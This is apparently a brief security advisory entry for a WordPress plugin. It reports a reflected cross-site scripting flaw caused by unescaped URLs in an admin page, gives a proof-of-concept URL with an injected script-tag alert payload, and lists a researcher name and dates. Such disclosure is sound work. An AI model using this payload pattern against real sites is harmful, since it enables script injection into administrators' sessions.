The plugin does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=hfcm-list&'><script>alert(/XSS/)</script>
Taurus Omar
Taurus Omar
Yes
2022-07-04 (about 11 months ago)
2022-07-04 (about 11 months ago)
2023-04-07 (about 1 months ago)